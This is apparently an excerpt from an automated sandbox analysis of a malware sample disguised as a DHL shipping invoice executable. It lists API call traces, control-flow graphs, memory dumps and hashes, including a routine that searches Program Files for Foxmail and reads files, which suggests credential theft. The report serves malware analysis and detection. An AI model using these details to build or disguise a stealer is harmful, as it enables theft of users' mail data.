                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                      • API String ID: 1100898210-787714339
                                                                                                                                                                                                                                      • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                                                                                                                                                                      • Instruction ID: cd662c2fc9a96c5040b18d0515cf0ea54f7952519699f51ce209c07819915f51
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20E0C2335016209BC6215F04ED08B5E776CAF58B32F05447AF8807B26087B81C838FD8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe,C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BE1
                                                                                                                                                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe,C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BF1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharPrevlstrlen
                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                                      • API String ID: 2709904686-3443045126
                                                                                                                                                                                                                                      • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                                                                                                      • Instruction ID: aeb767edbde6605fb3f6e877d1e8e55744b908c0e0c9ef55a7edb7ad10a4fca3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9D05EB2414920DAC3126B04DC40D9F73ACEF11300B4A446AE440A61A1D7786C8186AD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 73A4116A
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73A411C7
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73A411D9
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 73A41203
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423415300742.0000000073A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A40000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415272754.0000000073A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415327749.0000000073A44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415355677.0000000073A46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_73a40000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1780285237-0
                                                                                                                                                                                                                                      • Opcode ID: ceeaf58bc48e2175464f319e14a2c5ed43fcf314bf3b88dfa102b7ce6094f051
                                                                                                                                                                                                                                      • Instruction ID: 725cdc1c7ca3d8f3af240b116a609084857b44b199e4432cb7f73507796ca65a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ceeaf58bc48e2175464f319e14a2c5ed43fcf314bf3b88dfa102b7ce6094f051
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E3192B6500201DFE7009F6DCA47B2677F8EB89211734152FEC4AD7258E735D8428761
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                                                                                                                                                                                                                      • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                                                                                      • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                                                                      • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:1.3%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                      Signature Coverage:0.5%
                                                                                                                                                                                                                                      Total number of Nodes:184
                                                                                                                                                                                                                                      Total number of Limit Nodes:1
                                                                                                                                                                                                                                      execution_graph 8642 34651c5b 8643 34651c6b 8642->8643 8646 346512ee 8643->8646 8645 34651c87 8647 34651324 8646->8647 8648 346513b7 GetEnvironmentVariableW 8647->8648 8672 346510f1 8648->8672 8651 346510f1 57 API calls 8652 34651465 8651->8652 8653 346510f1 57 API calls 8652->8653 8654 34651479 8653->8654 8655 346510f1 57 API calls 8654->8655 8656 3465148d 8655->8656 8657 346510f1 57 API calls 8656->8657 8658 346514a1 8657->8658 8659 346510f1 57 API calls 8658->8659 8660 346514b5 lstrlenW 8659->8660 8661 346514d9 lstrlenW 8660->8661 8671 346514d2 8660->8671 8662 346510f1 57 API calls 8661->8662 8663 34651501 lstrlenW lstrcatW 8662->8663 8664 346510f1 57 API calls 8663->8664 8665 34651539 lstrlenW lstrcatW 8664->8665 8666 346510f1 57 API calls 8665->8666 8667 3465156b lstrlenW lstrcatW 8666->8667 8668 346510f1 57 API calls 8667->8668 8669 3465159d lstrlenW lstrcatW 8668->8669 8670 346510f1 57 API calls 8669->8670 8670->8671 8671->8645 8673 34651118 8672->8673 8674 34651129 lstrlenW 8673->8674 8685 34652c40 8674->8685 8677 34651177 lstrlenW FindFirstFileW 8679 346511e1 8677->8679 8680 346511a0 8677->8680 8678 34651168 lstrlenW 8678->8677 8679->8651 8681 346511c7 FindNextFileW 8680->8681 8682 346511aa 8680->8682 8681->8680 8684 346511da FindClose 8681->8684 8682->8681 8687 34651000 8682->8687 8684->8679 8686 34651148 lstrcatW lstrlenW 8685->8686 8686->8677 8686->8678 8688 34651022 8687->8688 8689 346510af 8688->8689 8690 3465102f lstrcatW lstrlenW 8688->8690 8691 346510b5 lstrlenW 8689->8691 8702 346510ad 8689->8702 8692 3465106b lstrlenW 8690->8692 8693 3465105a lstrlenW 8690->8693 8718 34651e16 8691->8718 8704 34651e89 lstrlenW 8692->8704 8693->8692 8696 34651088 GetFileAttributesW 8698 3465109c 8696->8698 8696->8702 8697 346510ca 8699 34651e89 5 API calls 8697->8699 8697->8702 8698->8702 8710 3465173a 8698->8710 8701 346510df 8699->8701 8723 346511ea 8701->8723 8702->8682 8705 34652c40 8704->8705 8706 34651ea7 lstrcatW lstrlenW 8705->8706 8707 34651ed1 lstrcatW 8706->8707 8708 34651ec2 8706->8708 8707->8696 8708->8707 8709 34651ec7 lstrlenW 8708->8709 8709->8707 8711 34651747 8710->8711 8738 34651cca 8711->8738 8715 3465199f 8715->8702 8716 34651824 8716->8715 8758 346515da 8716->8758 8719 34651e29 8718->8719 8722 34651e4c 8718->8722 8720 34651e2d lstrlenW 8719->8720 8719->8722 8721 34651e3f lstrlenW 8720->8721 8720->8722 8721->8722 8722->8697 8724 3465120e 8723->8724 8725 34651e89 5 API calls 8724->8725 8726 34651220 GetFileAttributesW 8725->8726 8727 34651235 8726->8727 8728 34651246 8726->8728 8727->8728 8730 3465173a 35 API calls 8727->8730 8729 34651e89 5 API calls 8728->8729 8731 34651258 8729->8731 8730->8728 8732 346510f1 56 API calls 8731->8732 8733 3465126d 8732->8733 8734 34651e89 5 API calls 8733->8734 8735 3465127f 8734->8735 8736 346510f1 56 API calls 8735->8736 8737 346512e6 8736->8737 8737->8702 8739 34651cf1 8738->8739 8740 34651d0f CopyFileW CreateFileW 8739->8740 8741 34651d55 GetFileSize 8740->8741 8742 34651d44 DeleteFileW 8740->8742 8743 34651ede 22 API calls 8741->8743 8747 34651808 8742->8747 8744 34651d66 ReadFile 8743->8744 8745 34651d94 CloseHandle DeleteFileW 8744->8745 8746 34651d7d CloseHandle DeleteFileW 8744->8746 8745->8747 8746->8747 8747->8715 8748 34651ede 8747->8748 8749 3465222f 8748->8749 8751 3465224e 8749->8751 8754 34652250 8749->8754 8766 3465474f 8749->8766 8771 346547e5 8749->8771 8751->8716 8753 34652908 8755 346535d2 RaiseException 8753->8755 8754->8753 8778 346535d2 8754->8778 8757 34652925 8755->8757 8757->8716 8759 3465160c 8758->8759 8760 3465163c lstrlenW 8759->8760 8866 34651c9d 8760->8866 8762 34651655 lstrcatW lstrlenW 8763 34651678 8762->8763 8764 3465167e lstrcatW 8763->8764 8765 34651693 8763->8765 8764->8765 8765->8716 8781 34654793 8766->8781 8769 3465478f 8769->8749 8770 34654765 8787 34652ada 8770->8787 8775 346556d0 8771->8775 8772 3465570e 8800 34656368 8772->8800 8773 346556f9 RtlAllocateHeap 8773->8775 8776 3465570c 8773->8776 8775->8772 8775->8773 8777 3465474f 7 API calls 8775->8777 8776->8749 8777->8775 8779 346535f2 RaiseException 8778->8779 8779->8753 8782 3465479f 8781->8782 8794 34655671 RtlEnterCriticalSection 8782->8794 8784 346547aa 8795 346547dc 8784->8795 8786 346547d1 8786->8770 8788 34652ae5 IsProcessorFeaturePresent 8787->8788 8789 34652ae3 8787->8789 8791 34652b58 8788->8791 8789->8769 8799 34652b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8791->8799 8793 34652c3b 8793->8769 8794->8784 8798 346556b9 RtlLeaveCriticalSection 8795->8798 8797 346547e3 8797->8786 8798->8797 8799->8793 8803 34655b7a GetLastError 8800->8803 8804 34655b93 8803->8804 8805 34655b99 8803->8805 8822 34655e08 8804->8822 8809 34655bf0 SetLastError 8805->8809 8829 3465637b 8805->8829 8811 34655bf9 8809->8811 8810 34655bb3 8836 3465571e 8810->8836 8811->8776 8815 34655bb9 8817 34655be7 SetLastError 8815->8817 8816 34655bcf 8849 3465593c 8816->8849 8817->8811 8820 3465571e 17 API calls 8821 34655be0 8820->8821 8821->8809 8821->8817 8854 34655c45 8822->8854 8824 34655e2f 8825 34655e47 TlsGetValue 8824->8825 8826 34655e3b 8824->8826 8825->8826 8827 34652ada 5 API calls 8826->8827 8828 34655e58 8827->8828 8828->8805 8830 34656388 8829->8830 8831 346563c8 8830->8831 8832 346563b3 RtlAllocateHeap 8830->8832 8835 3465474f 7 API calls 8830->8835 8834 34656368 19 API calls 8831->8834 8832->8830 8833 34655bab 8832->8833 8833->8810 8842 34655e5e 8833->8842 8834->8833 8835->8830 8837 34655729 HeapFree 8836->8837 8841 34655752 8836->8841 8838 3465573e 8837->8838 8837->8841 8839 34656368 18 API calls 8838->8839 8840 34655744 GetLastError 8839->8840 8840->8841 8841->8815 8843 34655c45 5 API calls 8842->8843 8844 34655e85 8843->8844 8845 34655ea0 TlsSetValue 8844->8845 8848 34655e94 8844->8848 8845->8848 8846 34652ada 5 API calls 8847 34655bc8 8846->8847 8847->8810 8847->8816 8848->8846 8860 34655914 8849->8860 8857 34655c71 8854->8857 8859 34655c75 8854->8859 8855 34655c95 8858 34655ca1 GetProcAddress 8855->8858 8855->8859 8856 34655ce1 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 8856->8857 8857->8855 8857->8856 8857->8859 8858->8859 8859->8824 8861 34655854 RtlEnterCriticalSection RtlLeaveCriticalSection 8860->8861 8862 34655938 8861->8862 8863 346558c4 8862->8863 8864 34655758 20 API calls 8863->8864 8865 346558e8 8864->8865 8865->8820 8867 34651ca6 8866->8867 8867->8762

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 34651137
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 34651151
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3465115C
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3465116D
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3465117C
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 34651193
                                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 346511D0
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 346511DB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1083526818-0
                                                                                                                                                                                                                                      • Opcode ID: 5f52d58b1a6aceb6ff139ab689841f5a1c80bf2eb1021ff50a367c839dd9b5fc
                                                                                                                                                                                                                                      • Instruction ID: 48096b5a36db9545762412886e49b1aed4527e56ce35918d0774bd0d424fa0c6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f52d58b1a6aceb6ff139ab689841f5a1c80bf2eb1021ff50a367c839dd9b5fc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D21A571904308ABD720EE649C48FDB7BACEF84354F00096AF998D31E1EB30D64587D6

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 34651434
                                                                                                                                                                                                                                        • Part of subcall function 346510F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 34651137
                                                                                                                                                                                                                                        • Part of subcall function 346510F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 34651151
                                                                                                                                                                                                                                        • Part of subcall function 346510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3465115C
                                                                                                                                                                                                                                        • Part of subcall function 346510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3465116D
                                                                                                                                                                                                                                        • Part of subcall function 346510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3465117C
                                                                                                                                                                                                                                        • Part of subcall function 346510F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 34651193
                                                                                                                                                                                                                                        • Part of subcall function 346510F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 346511D0
                                                                                                                                                                                                                                        • Part of subcall function 346510F1: FindClose.KERNEL32(00000000), ref: 346511DB
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 346514C5
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 346514E0
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 3465150F
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 34651521
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 34651547
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 34651553
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 34651579
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 34651585
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 346515AB
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 346515B7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                                      • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                                      • API String ID: 672098462-2938083778
                                                                                                                                                                                                                                      • Opcode ID: d74b199edc75c994b28c8d9709a168129fc8e1bedb9a7bdc1600c1f30f733e21
                                                                                                                                                                                                                                      • Instruction ID: 95e52fe3a34e16d74cdba89cda26d56728d1f7f2e520a26275c309b0a83c974d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d74b199edc75c994b28c8d9709a168129fc8e1bedb9a7bdc1600c1f30f733e21
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D818F75A40368AAEB20DBA09C85FEE737DEF84710F0005DAF509E7190EA755A84CF99

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 63 40338f-4033cc SetErrorMode GetVersion 64 4033ce-4033d6 call 406694 63->64 65 4033df 63->65 64->65 71 4033d8 64->71 66 4033e4-4033f8 call 406624 lstrlenA 65->66 72 4033fa-403416 call 406694 * 3 66->72 71->65 79 403427-403486 #17 OleInitialize SHGetFileInfoW call 4062ba GetCommandLineW call 4062ba 72->79 80 403418-40341e 72->80 87 403490-4034aa call 405bbc CharNextW 79->87 88 403488-40348f 79->88 80->79 85 403420 80->85 85->79 91 4034b0-4034b6 87->91 92 4035c1-4035db GetTempPathW call 40335e 87->92 88->87 94 4034b8-4034bd 91->94 95 4034bf-4034c3 91->95 99 403633-40364d DeleteFileW call 402edd 92->99 100 4035dd-4035fb GetWindowsDirectoryW lstrcatW call 40335e 92->100 94->94 94->95 97 4034c5-4034c9 95->97 98 4034ca-4034ce 95->98 97->98 101 4034d4-4034da 98->101 102 40358d-40359a call 405bbc 98->102 120 403653-403659 99->120 121 4036fe-40370e call 4038d0 OleUninitialize 99->121 100->99 117 4035fd-40362d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40335e 100->117 106 4034f5-40352e 101->106 107 4034dc-4034e4 101->107 118 40359c-40359d 102->118 119 40359e-4035a4 102->119 108 403530-403535 106->108 109 40354b-403585 106->109 113 4034e6-4034e9 107->113 114 4034eb 107->114 108->109 115 403537-40353f 108->115 109->102 116 403587-40358b 109->116 113->106 113->114 114->106 123 403541-403544 115->123 124 403546 115->124 116->102 125 4035ac-4035ba call 4062ba 116->125 117->99 117->121 118->119 119->91 127 4035aa 119->127 128 4036ee-4036fa call 4039aa 120->128 129 40365f-40366a call 405bbc 120->129 137 403834-40383a 121->137 138 403714-403724 call 405920 ExitProcess 121->138 123->109 123->124 124->109 132 4035bf 125->132 127->132 128->121 140 4036b8-4036c2 129->140 141 40366c-4036a1 129->141 132->92 143 4038b8-4038c0 137->143 144 40383c-403852 GetCurrentProcess OpenProcessToken 137->144 148 4036c4-4036d2 call 405c97 140->148 149 40372a-40373e call 40588b lstrcatW 140->149 145 4036a3-4036a7 141->145 146 4038c2 143->146 147 4038c6-4038ca ExitProcess 143->147 151 403854-403882 LookupPrivilegeValueW AdjustTokenPrivileges 144->151 152 403888-403896 call 406694 144->152 153 4036b0-4036b4 145->153 154 4036a9-4036ae 145->154 146->147 148->121 162 4036d4-4036ea call 4062ba * 2 148->162 163 403740-403746 lstrcatW 149->163 164 40374b-403765 lstrcatW lstrcmpiW 149->164 151->152 165 4038a4-4038af ExitWindowsEx 152->165 166 403898-4038a2 152->166 153->145 158 4036b6 153->158 154->153 154->158 158->140 162->128 163->164 164->121 169 403767-40376a 164->169 165->143 167 4038b1-4038b3 call 40140b 165->167 166->165 166->167 167->143 173 403773 call 40586e 169->173 174 40376c-403771 call 4057f1 169->174 178 403778-403786 SetCurrentDirectoryW 173->178 174->178 181 403793-4037bc call 4062ba 178->181 182 403788-40378e call 4062ba 178->182 186 4037c1-4037dd call 4062dc DeleteFileW 181->186 182->181 189 40381e-403826 186->189 190 4037df-4037ef CopyFileW 186->190 189->186 191 403828-40382f call 406080 189->191 190->189 192 4037f1-403811 call 406080 call 4062dc call 4058a3 190->192 191->121 192->189 201 403813-40381a CloseHandle 192->201 201->189
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32 ref: 004033B2
                                                                                                                                                                                                                                      • GetVersion.KERNEL32 ref: 004033B8
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                                                                                                                                                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0040342F
                                                                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040344B
                                                                                                                                                                                                                                      • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
                                                                                                                                                                                                                                      • CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000006,00000008,0000000A), ref: 00403498
                                                                                                                                                                                                                                        • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                                                                        • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000400,00441800,?,00000006,00000008,0000000A), ref: 004035D2
                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(00441800,000003FB,?,00000006,00000008,0000000A), ref: 004035E3
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00441800,\Temp,?,00000006,00000008,0000000A), ref: 004035EF
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp,?,00000006,00000008,0000000A), ref: 00403603
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00441800,Low,?,00000006,00000008,0000000A), ref: 0040360B
                                                                                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low,?,00000006,00000008,0000000A), ref: 0040361C
                                                                                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,00441800,?,00000006,00000008,0000000A), ref: 00403624
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00441000,?,00000006,00000008,0000000A), ref: 00403638
                                                                                                                                                                                                                                        • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403703
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403724
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403746
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403751
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00441800,00441800,?,00000006,00000008,0000000A), ref: 00403779
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
